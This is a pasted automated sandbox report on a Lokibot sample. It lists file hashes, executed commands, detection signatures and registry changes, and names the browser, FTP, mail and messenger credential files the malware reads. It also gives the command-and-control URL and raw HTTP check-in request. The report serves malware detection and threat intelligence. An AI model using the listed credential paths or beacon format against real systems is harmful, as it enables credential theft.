Advertisement
paladin316

871Loki_dc4d2a719a8f6353d0102858c9b0f352_1_2019-09-03_21_30.txt

Sep 3rd, 2019
1,337
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.45 KB | None | 0 0
  1.  
  2. * ID: 871
  3. * MalFamily: "Lokibot"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Loki_dc4d2a719a8f6353d0102858c9b0f352.1"
  8. * File Size: 921600
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "8eac1bfd98d57bc7a33fc7637319ebf8727d4c04923f066a415089702e54accc"
  11. * MD5: "dc4d2a719a8f6353d0102858c9b0f352"
  12. * SHA1: "9f3ce02fb61065ac3731737d5d768f16e62d09d2"
  13. * SHA512: "0dad51cef994c0f69f420507e39ac567ebb318dfbc30c5a944be5ffb3c92b32f930d68c4e9b039018e75239f406ccecb9517ec0d5d0fafa6de0e90889b971429"
  14. * CRC32: "B72B8C3E"
  15. * SSDEEP: "3072:23Ra0Lux/6g4uK4QScFX/QMHNrylcgzuRSJwlQuv5hHUdw:GRa0Ltg4bdPQsrcJ2lZhs"
  16.  
  17. * Process Execution:
  18. "eoWsQknqhAlmrz.exe",
  19. "wscript.exe",
  20. "filename.exe",
  21. "filename.exe",
  22. "explorer.exe",
  23. "services.exe",
  24. "lsass.exe",
  25. "WmiApSrv.exe",
  26. "WmiPrvSE.exe",
  27. "WMIADAP.exe"
  28.  
  29.  
  30. * Executed Commands:
  31. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
  32. "C:\\Users\\user\\subfolder\\filename.vbs ",
  33. "\"C:\\Users\\user\\subfolder\\filename.exe\"",
  34. "C:\\Users\\user\\subfolder\\filename.exe ",
  35. "C:\\Windows\\system32\\lsass.exe",
  36. "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
  37. "C:\\Windows\\system32\\svchost.exe -k netsvcs"
  38.  
  39.  
  40. * Signatures Detected:
  41.  
  42. "Description": "Behavioural detection: Executable code extraction",
  43. "Details":
  44.  
  45.  
  46. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  47. "Details":
  48.  
  49.  
  50. "Description": "Creates RWX memory",
  51. "Details":
  52.  
  53.  
  54. "Description": "Possible date expiration check, exits too soon after checking local time",
  55. "Details":
  56.  
  57. "process": "eoWsQknqhAlmrz.exe, PID 1576"
  58.  
  59.  
  60.  
  61.  
  62. "Description": "Detected script timer window indicative of sleep style evasion",
  63. "Details":
  64.  
  65. "Window": "WSH-Timer"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Reads data out of its own binary image",
  71. "Details":
  72.  
  73. "self_read": "process: eoWsQknqhAlmrz.exe, pid: 1576, offset: 0x00000000, length: 0x000e1000"
  74.  
  75.  
  76. "self_read": "process: wscript.exe, pid: 2872, offset: 0x00000000, length: 0x00000040"
  77.  
  78.  
  79. "self_read": "process: wscript.exe, pid: 2872, offset: 0x000000f0, length: 0x00000018"
  80.  
  81.  
  82. "self_read": "process: wscript.exe, pid: 2872, offset: 0x000001e8, length: 0x00000078"
  83.  
  84.  
  85. "self_read": "process: wscript.exe, pid: 2872, offset: 0x00018000, length: 0x00000020"
  86.  
  87.  
  88. "self_read": "process: wscript.exe, pid: 2872, offset: 0x00018058, length: 0x00000018"
  89.  
  90.  
  91. "self_read": "process: wscript.exe, pid: 2872, offset: 0x000181a8, length: 0x00000018"
  92.  
  93.  
  94. "self_read": "process: wscript.exe, pid: 2872, offset: 0x00018470, length: 0x00000010"
  95.  
  96.  
  97. "self_read": "process: wscript.exe, pid: 2872, offset: 0x00018640, length: 0x00000012"
  98.  
  99.  
  100.  
  101.  
  102. "Description": "A process created a hidden window",
  103. "Details":
  104.  
  105. "Process": "eoWsQknqhAlmrz.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
  106.  
  107.  
  108. "Process": "eoWsQknqhAlmrz.exe -> C:\\Users\\user\\subfolder\\filename.exe"
  109.  
  110.  
  111.  
  112.  
  113. "Description": "Drops a binary and executes it",
  114. "Details":
  115.  
  116. "binary": "C:\\Users\\user\\subfolder\\filename.exe"
  117.  
  118.  
  119.  
  120.  
  121. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  122. "Details":
  123.  
  124. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  125.  
  126.  
  127. "http_version_old": "HTTP traffic uses version 1.0"
  128.  
  129.  
  130. "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php"
  131.  
  132.  
  133.  
  134.  
  135. "Description": "Performs some HTTP requests",
  136. "Details":
  137.  
  138. "url_iocs": "http://jiraiya.info/joe23/five/fre.php"
  139.  
  140.  
  141.  
  142.  
  143. "Description": "A scripting utility was executed",
  144. "Details":
  145.  
  146. "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
  147.  
  148.  
  149.  
  150.  
  151. "Description": "Behavioural detection: Injection (Process Hollowing)",
  152. "Details":
  153.  
  154. "Injection": "filename.exe(1672) -> filename.exe(1156)"
  155.  
  156.  
  157.  
  158.  
  159. "Description": "Executed a process and injected code into it, probably while unpacking",
  160. "Details":
  161.  
  162. "Injection": "filename.exe(1672) -> filename.exe(1156)"
  163.  
  164.  
  165.  
  166.  
  167. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  168. "Details":
  169.  
  170. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 14539018 times"
  171.  
  172.  
  173.  
  174.  
  175. "Description": "Steals private information from local Internet browsers",
  176. "Details":
  177.  
  178. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  179.  
  180.  
  181.  
  182.  
  183. "Description": "Installs itself for autorun at Windows startup",
  184. "Details":
  185.  
  186. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
  187.  
  188.  
  189. "data": "C:\\Users\\user\\subfolder\\filename.vbs -cz"
  190.  
  191.  
  192.  
  193.  
  194. "Description": "Creates a hidden or system file",
  195. "Details":
  196.  
  197. "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  198.  
  199.  
  200.  
  201.  
  202. "Description": "Creates a copy of itself",
  203. "Details":
  204.  
  205. "copy": "C:\\Users\\user\\subfolder\\filename.exe"
  206.  
  207.  
  208. "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  209.  
  210.  
  211.  
  212.  
  213. "Description": "Harvests credentials from local FTP client softwares",
  214. "Details":
  215.  
  216. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  217.  
  218.  
  219. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  220.  
  221.  
  222. "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
  223.  
  224.  
  225. "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
  226.  
  227.  
  228. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
  229.  
  230.  
  231. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
  232.  
  233.  
  234. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  235.  
  236.  
  237. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  238.  
  239.  
  240. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  241.  
  242.  
  243. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  244.  
  245.  
  246.  
  247.  
  248. "Description": "Harvests information related to installed instant messenger clients",
  249. "Details":
  250.  
  251. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  252.  
  253.  
  254.  
  255.  
  256. "Description": "Harvests information related to installed mail clients",
  257. "Details":
  258.  
  259. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  260.  
  261.  
  262. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
  263.  
  264.  
  265. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  266.  
  267.  
  268. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  269.  
  270.  
  271. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
  272.  
  273.  
  274. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
  275.  
  276.  
  277. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  278.  
  279.  
  280. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  281.  
  282.  
  283. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  284.  
  285.  
  286. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
  287.  
  288.  
  289. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
  290.  
  291.  
  292. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  293.  
  294.  
  295. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  296.  
  297.  
  298. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  299.  
  300.  
  301. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
  302.  
  303.  
  304. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  305.  
  306.  
  307. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
  308.  
  309.  
  310. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
  311.  
  312.  
  313. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
  314.  
  315.  
  316. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
  317.  
  318.  
  319. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  320.  
  321.  
  322. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  323.  
  324.  
  325. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  326.  
  327.  
  328. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  329.  
  330.  
  331. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
  332.  
  333.  
  334. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  335.  
  336.  
  337. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  338.  
  339.  
  340. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
  341.  
  342.  
  343. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
  344.  
  345.  
  346. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  347.  
  348.  
  349. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  350.  
  351.  
  352. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  353.  
  354.  
  355. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  356.  
  357.  
  358. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  359.  
  360.  
  361. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
  362.  
  363.  
  364.  
  365.  
  366. "Description": "Collects information to fingerprint the system",
  367. "Details":
  368.  
  369.  
  370. "Description": "Created network traffic indicative of malicious activity",
  371. "Details":
  372.  
  373. "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
  374.  
  375.  
  376. "signature": "ET TROJAN LokiBot Fake 404 Response"
  377.  
  378.  
  379. "signature": "ET TROJAN LokiBot Checkin"
  380.  
  381.  
  382. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
  383.  
  384.  
  385. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
  386.  
  387.  
  388. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
  389.  
  390.  
  391. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
  392.  
  393.  
  394.  
  395.  
  396.  
  397. * Started Service:
  398. "VaultSvc",
  399. "wmiApSrv"
  400.  
  401.  
  402. * Mutexes:
  403. "Local\\ZoneAttributeCacheCounterMutex",
  404. "Local\\ZonesCacheCounterMutex",
  405. "Local\\ZonesLockedCacheCounterMutex",
  406. "6EFA73A4746045B65DEE781E",
  407. "Global\\RefreshRA_Mutex_Lib",
  408. "Global\\RefreshRA_Mutex",
  409. "Global\\RefreshRA_Mutex_Flag",
  410. "Global\\WmiApSrv",
  411. "Global\\ADAP_WMI_ENTRY"
  412.  
  413.  
  414. * Modified Files:
  415. "C:\\Users\\user\\subfolder\\filename.exe",
  416. "C:\\Users\\user\\subfolder\\filename.vbs",
  417. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  418. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  419.  
  420.  
  421. * Deleted Files:
  422. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  423. "C:\\Users\\user\\subfolder\\filename.exe"
  424.  
  425.  
  426. * Modified Registry Keys:
  427. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  428. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  429. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.106\\CheckSetting",
  430. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.101\\CheckSetting",
  431. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.100\\CheckSetting",
  432. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.102\\CheckSetting",
  433. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.103\\CheckSetting",
  434. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.104\\CheckSetting",
  435. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\S38OS404-1Q43-42S2-9305-67QR0O28SP23\\rkcybere.rkr",
  436. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  437. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name",
  438. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
  439. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  440. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed"
  441.  
  442.  
  443. * Deleted Registry Keys:
  444. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  445. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  446. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  447. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  448.  
  449.  
  450. * DNS Communications:
  451.  
  452. "type": "A",
  453. "request": "jiraiya.info",
  454. "answers":
  455.  
  456. "data": "47.88.102.244",
  457. "type": "A"
  458.  
  459.  
  460.  
  461.  
  462.  
  463. * Domains:
  464.  
  465. "ip": "47.88.102.244",
  466. "domain": "jiraiya.info"
  467.  
  468.  
  469.  
  470. * Network Communication - ICMP:
  471.  
  472. * Network Communication - HTTP:
  473.  
  474. "count": 2,
  475. "body": "",
  476. "uri": "http://jiraiya.info/joe23/five/fre.php",
  477. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  478. "method": "POST",
  479. "host": "jiraiya.info",
  480. "version": "1.0",
  481. "path": "/joe23/five/fre.php",
  482. "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  483. "port": 80
  484.  
  485.  
  486. "count": 30,
  487. "body": "",
  488. "uri": "http://jiraiya.info/joe23/five/fre.php",
  489. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  490. "method": "POST",
  491. "host": "jiraiya.info",
  492. "version": "1.0",
  493. "path": "/joe23/five/fre.php",
  494. "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  495. "port": 80
  496.  
  497.  
  498.  
  499. * Network Communication - SMTP:
  500.  
  501. * Network Communication - Hosts:
  502.  
  503. "country_name": "United States",
  504. "ip": "47.88.102.244",
  505. "inaddrarpa": "",
  506. "hostname": "jiraiya.info"
  507.  
  508.  
  509.  
  510. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement